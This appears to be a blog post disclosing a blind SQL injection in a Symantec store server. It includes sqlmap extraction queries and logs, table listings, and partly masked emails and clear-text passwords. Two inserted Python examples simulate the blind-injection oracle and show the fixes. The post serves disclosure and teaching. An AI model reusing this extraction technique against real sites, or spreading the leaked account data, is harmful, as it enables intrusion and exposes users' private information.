Symantec exposed: passwords, serials… SQL injection, full database access
“Symantec was founded in 1982 by visionary computer scientists. The company has evolved to become one of the world’s largest software companies with more than 17,500 employees in more than 40 countries. Symantec helps consumers and organizations secure and manage their information-driven world. Our software and services protect against more risks at more points, more completely and efficiently, enabling confidence wherever information is used or stored.”
That is what we can read on their site. Interesting, especially in light of what follows: a single improperly sanitized parameter gives full access to a Symantec database server and to the sensitive data stored on it. It seems strange that a company which sells security software (the famous Norton, for example) and promises to protect us is not able to protect its own database. Let’s see what is actually there.
Blind SQL injection is less spectacular than a normal SQL injection, because the result of the injected query (or the error it produces) never appears on the page. It is based on the concept of true and false. When we “ask” the server something true (and 1=1 in our case) it answers truthfully: the page loads properly.
When we “ask” something untrue (and 1=2) the page no longer loads. Each such yes/no answer leaks one bit, so the contents of the database can be extracted one comparison at a time.
Therefore, to demonstrate the vulnerability, I used two tools, Pangolin and sqlmap.
We find that:
web server operating system: Windows 2003 or 2000
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
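The true/false mechanism described above, as an added example that is not part of the original post: a small Python simulation of a page that concatenates its id parameter into the query, a boolean oracle built from it, and the binary search that a tool such as sqlmap uses to recover a row count or a password one comparison at a time. SQLite stands in for the MSSQL 2000 back end (SQLite's length/substr/unicode correspond to LEN/SUBSTRING/ASCII on MSSQL); the table contents are constructed, and the parameterized safe_page shows the fix.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the vulnerable back end. Table names mirror the
    post (TB_NOTICE, TB_MEMBER); the rows are invented sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TB_NOTICE (N_ID INTEGER, N_TITLE TEXT)")
    conn.execute("INSERT INTO TB_NOTICE VALUES (1, 'Welcome')")
    conn.execute("CREATE TABLE TB_MEMBER (M_USERID TEXT, M_PASS TEXT)")
    conn.executemany(
        "INSERT INTO TB_MEMBER VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55")],
    )
    return conn


def vulnerable_page(conn: sqlite3.Connection, notice_id: str) -> bool:
    """The flawed page logic: the request parameter is concatenated straight
    into the SQL text. Returns True when the page would render a notice
    ("loads properly") and False when the query yields nothing or errors."""
    sql = "SELECT N_TITLE FROM TB_NOTICE WHERE N_ID = " + notice_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def ask(conn: sqlite3.Connection, condition: str) -> bool:
    """One boolean question: 'AND (condition)' appended to a valid id.
    Page loads / page fails is the only thing the attacker observes."""
    return vulnerable_page(conn, f"1 AND ({condition})")


def blind_int(conn: sqlite3.Connection, expr: str, max_bits: int = 8) -> int:
    """Recover an integer-valued SQL expression in [0, 2**max_bits] by binary
    search, asking at most max_bits questions."""
    lo, hi = 0, 1 << max_bits
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(conn, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(conn: sqlite3.Connection, scalar_subquery: str, max_len_bits: int = 7) -> str:
    """Recover a string one character at a time: first its length, then the
    code of each character (8 questions per character for ASCII)."""
    length = blind_int(conn, f"length(({scalar_subquery}))", max_len_bits)
    chars = []
    for pos in range(1, length + 1):
        code = blind_int(conn, f"unicode(substr(({scalar_subquery}), {pos}, 1))")
        chars.append(chr(code))
    return "".join(chars)


def safe_page(conn: sqlite3.Connection, notice_id: str) -> bool:
    """The fix: validate the type and bind the value as a parameter, so
    'and 1=1' can never become part of the query."""
    try:
        nid = int(notice_id)
    except ValueError:
        return False
    row = conn.execute("SELECT N_TITLE FROM TB_NOTICE WHERE N_ID = ?", (nid,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_page(db, "1 AND 1=1"), vulnerable_page(db, "1 AND 1=2"))  # True False
    print(blind_int(db, "SELECT COUNT(*) FROM TB_MEMBER"))  # 3
    print(blind_string(db, "SELECT M_PASS FROM TB_MEMBER WHERE M_USERID = 'alice'"))  # s3cret
    print(safe_page(db, "1 AND 1=1"), safe_page(db, "1"))  # False True
```

With an 8-bit search every character costs at most eight page loads, so a six-digit row count or a seven-character password is recovered in a few dozen requests; nothing in the response body is needed beyond whether the page rendered. Against the real target the oracle would be an HTTP request to the ASP page and the expressions would use LEN/SUBSTRING/ASCII, but the search logic is identical.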
The first screenshot shows information about the server. The worst part, highlighted in red in the picture, is that we have access to the drives (C:\ and D:\), i.e. WE CAN BROWSE THE SERVER AS IF IT WERE OUR OWN PC. Reading drive contents through the database means the web application’s database account has far more privileges on SQL Server than it needs.
The next two screenshots show the databases we have access to:
It is clear that we are on a Symantec server. Oasis, OneCare, etc. are important Symantec projects (Northwind, by contrast, is the sample database that ships with SQL Server, not a Symantec project). Two databases, highlighted in red in the picture, seemed particularly interesting to me: one related to Norton and symantecstore.
The nortonplus database is huge: it contains 91 tables. I list them without further details.
Database: nortonplus
[91 tables]
+——————-
| AccessLogs
| bak_counsel_071111
| bak_counsel_080424
| dtproperties
| sysconstraints
| syssegments
| T_pcList
| T_pcList_nor
| tb_account_sym
| TB_BILLCLOSE_LOG
| TB_Charge
| TB_CIRCULATION
| TB_CODE
| TB_CONFIRM_LOG
| TB_COUNSEL
| TB_COUNSEL_CLAIM
| TB_COUNSEL_LOG
| TB_COUNSEL_STOP
| TB_COUNSEL_TECHNICAL
| TB_DEFENSE
| TB_DEFENSE_LOG
| TB_DEPARTMENT
| TB_EMPLOYEE
| TB_Event
| TB_Faq
| TB_FUNCTION_CODE
| TB_FUNCTION_ID
| TB_GENERAL_CLAIM
| TB_GENERAL_CLAIM_LOG
| TB_Group
| TB_groupMenu
| TB_HANAFOS_EVENT
| TB_HANAFOS_SYNC
| TB_mailBoard
| TB_MEMBER
| TB_Menu
| TB_MODIFY_EXPIRATION_DATE
| TB_myClip
| TB_nortonHelp
| TB_nortonHelp_Cmt
| TB_Notice
| TB_OFFLINE
| TB_OFFLINE_LOG
| TB_pcBreakDown
| TB_pcBreakDown_Cmt
| TB_Pds
| TB_PERFORMANCE
| TB_PIN_CANCEL
| TB_Praise
| TB_Qna
| TB_reCom
| TB_REFUND
| TB_REFUND_LOG
| TB_RESERVE
| TB_RESERVE_TIME
| TB_RETENTION
| TB_secInfo
| TB_secNews
| TB_secReport
| TB_secure_free
| TB_secure_free_comment
| TB_SMS_LOG
| TB_SMS_LOG_MB
| TB_STOCKED_PIN
| TB_TIMECARD
| TB_TIMECARD_LOG
| TB_VENDER
| tmp_counsel
| tmp_monthday
| v_accounts
| V_CLAIM_MEMBER
| V_DEFENSE_LIST1
| V_GENERAL_CLAIM_LIST
| V_LOCK
| V_MEM_ALL
| V_MEM_ALLLIST
| V_MEM_CLAIM
| V_MEM_LIST
| V_MEM_LIST2
| V_MEM_LIST3
| V_MY_ANSWER
| V_MY_CLIP
| V_MY_HELP_Break_Cmt
| V_MY_HELP_BreakDown
| V_MY_QUEST
| V_OFFLINE_LIST
| V_PERFORMANCE
| V_REFUND_LIST
| V_RETENTION_LIST
| ZIPCODE
| zipcode1
+———————
I will dwell more on the symantecstore database, since a shop’s database in particular should be protected. It contains 56 tables.
Database: symantecstore
[56 tables]
+—————————
| AddressInfo
| CatalogKey
| CategoryKey
| dtproperties
| ExtendedAttributesInfo
| ExtendedAttributesInfoArray
| JapanTelnet
| LineItemDigitalInfo
| LineItemDigitalInfoArray
| LineItemInfo
| LineItemInfoArray
| LineItemPriceInfo
| LineItemTaxListInfo
| OrderInfo
| OrderPriceInfo
| PaymentInformationArray
| PaymentInformationInfo
| PCDoctorTelnet
| ProductDataInfo
| ProductKey
| SiteInfo
| sysconstraints
| syssegments
| TB_CASEID
| TB_COMPANY2
| TB_Complete_seq
| TB_COUNSEL
| TB_COUNSEL2
| TB_COUNSEL_LOG
| TB_CRM_REPORT
| TB_CRM_REPORT_CODE
| TB_CsDetail
| TB_CSTYPE
| TB_EMAIL_SEND
| TB_EMPLOYEE
| TB_EXCEL_TEST
| TB_FTP_UPLOAD
| TB_FTP_UPLOAD_LOG
| TB_INCENTIVE
| TB_MEMBER
| TB_NOTICE
| TB_NUM_INCENTIVE
| TB_OOS_LOG
| TB_ORDER
| TB_ORDER_INFO
| TB_ORDER_LOG
| TB_PRODUCT
| TB_QNA
| TB_QNA1
| TB_VERSION
| TB_WORRIMENT
| UserInfo
| UserKey
| V_MEM_LIST
| V_MEM_LIST1
| ZIPCODE
+———————–
One of the tables is TB_MEMBER, which contains 70,356 rows of member data (here I called on sqlmap for help; note that even the row count is retrieved through the blind oracle):
[16:27:41] [INFO] fetching number of columns 'M_EMAIL, M_NAME, M_PASS, M_USERID' entries for table 'TB_MEMBER' on database 'symantecstore'
[16:27:41] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000)), CHAR(32)) FROM symantecstore..TB_MEMBER
[16:27:41] [INFO] retrieved: 70356
I randomly selected six users, rows 100 to 105 of the table. I was outraged when I saw the result shown by sqlmap: these users’ passwords are stored in CLEAR TEXT!!! (To protect the users concerned, some letters have been replaced with X’s.)
Database: symantecstore
Table: TB_MEMBER
[6 entries]
+------------------------+--------+-----------+----------+
| M_EMAIL                | M_NAME | M_PASS    | M_USERID |
+------------------------+--------+-----------+----------+
| khj_XX@hotmail.com     | XXXX   | shsaraXXX | mysandy  |
| kyh1XXX@hanmail.net    | XXX    | kyh1XXX   | kyh1658  |
| gyuXXX@hanmail.net     | XXX    | s062XXX   | gyum96   |
| tjhwaXX@hotmail.com    | XXX    | 60XXX     | tjhwang  |
| dyb2XXX@hotmail.com    | XXX    | doXXX     | dyb2012  |
| yosugi10XX@hotmail.com | XXXX   | ys5XXX    | yosugi   |
+------------------------+--------+-----------+----------+
Similarly, the passwords of the 134 employees in the TB_EMPLOYEE table are stored in CLEAR TEXT. Note also that four of the six accounts shown appear to share the same password, which suggests a default or shared password for staff accounts.
Database: symantecstore
Table: TB_EMPLOYEE
[6 entries]
+----------+--------+------------+
| E_ID     | E_NAME | E_PASSWORD |
+----------+--------+------------+
| sysedit2 | XXX    | s76083XXX  |
| zany     | XXX    | asdXXX     |
| zany1    | XXX    | hm12XXX    |
| s0167    | XXX    | hm12XXX    |
| s0166    | XXX    | hm12XXX    |
| s0191    | XXX    | hm12XXX    |
+----------+--------+------------+
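What correct storage of the member and employee passwords above would look like, as an added example (not the site’s code; the employee rows and passwords are constructed, and the PBKDF2-SHA256 scheme and iteration count are my choice): each password is hashed with a per-user random salt, so even the accounts that share a password get different stored values, and login compares digests in constant time.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Iterable, Optional, Tuple

# Assumed work factor; tune upwards for your hardware (OWASP currently
# recommends several hundred thousand iterations for PBKDF2-SHA256).
ITERATIONS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex'. A fresh 16-byte
    salt is drawn per password unless one is supplied (only for tests)."""
    if salt is None:
        salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and iteration count and
    compare in constant time; never compare the strings with ==."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


# Constructed rows modelled on the TB_EMPLOYEE listing (E_ID, E_PASSWORD).
# The passwords are invented; three accounts deliberately share one.
EMPLOYEES: Tuple[Tuple[str, str], ...] = (
    ("sysedit2", "s76083xyz"),
    ("zany1", "hm12abc"),
    ("s0167", "hm12abc"),
    ("s0166", "hm12abc"),
)


def build_employee_table(rows: Iterable[Tuple[str, str]] = EMPLOYEES) -> Dict[str, str]:
    """What E_PASSWORD should hold: a salted hash per account, never the text."""
    return {eid: hash_password(pw) for eid, pw in rows}


def login(table: Dict[str, str], eid: str, password: str) -> bool:
    """Authenticate against the hashed table. An unknown user still costs one
    hash computation so response time does not reveal valid E_IDs."""
    stored = table.get(eid)
    if stored is None:
        hash_password(password)
        return False
    return verify_password(password, stored)


if __name__ == "__main__":
    table = build_employee_table()
    for eid, stored in table.items():
        print(eid, stored[:60] + "...")  # identical passwords, different digests
    print(login(table, "zany1", "hm12abc"), login(table, "zany1", "wrong"))  # True False
```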
Since this is a shop, I was curious what the PaymentInformationInfo table contains. I show only its columns, no other details:
Database: symantecstore
Table: PaymentInformationInfo
[20 columns]
+———————
| Column
+———————
| AuthorizationID
| BillingAddress
| CardExpirationMonth
| CardExpirationYear
| CardNumber
| CardType
| CcIssueCode
| CcIssueMonth
| CcIssueYear
| CustomerEmail
| CustomerFirstName
| CustomerLastName
| CustomerPO
| OrderID
| PaymentAmount
| PaymentMethodName
| PaymentType
| RoutingNumber
| SecurityIndicator
| VatNumber
+——————-
Whatever CardNumber actually holds (the listing shows only the schema), a full card number stored beside the expiry date and billing address is precisely the data that PCI DSS requires to be encrypted or truncated at rest. The columns of the TB_ORDER table are:
Database: symantecstore
Table: TB_ORDER
[12 columns]
+—————
| Column
+—————
| AreaCode
| Locale
| OrderDate
| OrderNum
| Platform
| ProductName
| ProductNumber
| Qty
| S_SEQ
| SaleAmount
| SerialNumber
| sku
+—————
And when sqlmap is put to work, it is no great surprise to find that this table contains 122,152 serial numbers.
[16:39:22] [INFO] fetching number of columns 'ProductName, ProductNumber, SerialNumber' entries for table 'TB_ORDER' on database 'symantecstore'
[16:39:22] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000)), CHAR(32)) FROM symantecstore..TB_ORDER
[16:39:22] [INFO] retrieved: 122152
If you remember, in February Kaspersky faced a SQL injection. They had the courage to admit the vulnerability, for which they have my admiration. There was fair play: they quickly secured the vulnerable parameter, and even if at first they were very angry with me, in the end they understood that I did not extract anything, I saved nothing, and I did not abuse the data I found in any way. My goal was, and still is, to warn. To draw attention.
That being said, I await Symantec’s reaction with curiosity.
Source: http://unu123456.baywords.com